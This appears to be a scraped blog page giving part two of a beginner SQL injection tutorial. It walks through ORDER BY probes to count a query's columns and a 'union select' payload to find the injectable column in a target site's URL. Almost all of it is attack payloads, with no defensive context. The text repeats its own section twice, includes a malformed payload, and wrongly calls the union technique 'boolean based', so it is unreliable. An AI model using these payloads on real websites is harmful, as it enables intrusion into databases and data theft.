SQLi part 1 : http://terminalcoders.blogspot.in/2012/11/sql-injection-tutorial-for-beginners.html
READ New Part
"+ORDER+BY+1--" --> No Error
"+ORDER+BY+2--" --> No Error
"+ORDER+BY+3--" --> No Error
"+ORDER+BY+4--" --> No Error
"+ORDER+BY+5--" --> No Error
"+ORDER+BY+6--" --> Error
Total Column number=5.
But nothing happen in this session. Error message "different number of columns"
So I add an error function "AND+1=2" in URL.
"+and+1=2+union+select1,2,3,4,5--"
Now OK vulnerable column is 2.
This type of SQL Injection is called "BOOLEAN BASED" SQLi.
<<<<<<<<<<<<<<<<<<--------------- SHARE WITH FRIENDS ---------------->>>>>>>>>>>>>>>>
READ New Part
Counting Total Column
"+ORDER+BY+1--" --> No Error
"+ORDER+BY+2--" --> No Error
"+ORDER+BY+3--" --> No Error
"+ORDER+BY+4--" --> No Error
"+ORDER+BY+5--" --> No Error
"+ORDER+BY+6--" --> Error
Total Column number=5.
Finding vulnerable column
"+union+select+1,2,3,4,5--" --> Nothing Happend.
But nothing happen in this session. Error message "different number of columns"
So I add an error function "AND+1=2" in URL.
"+and+1=2+union+select1,2,3,4,5--"
Now OK vulnerable column is 2.
This type of SQL Injection is called "BOOLEAN BASED" SQLi.
<<<<<<<<<<<<<<<<<<--------------- SHARE WITH FRIENDS ---------------->>>>>>>>>>>>>>>>
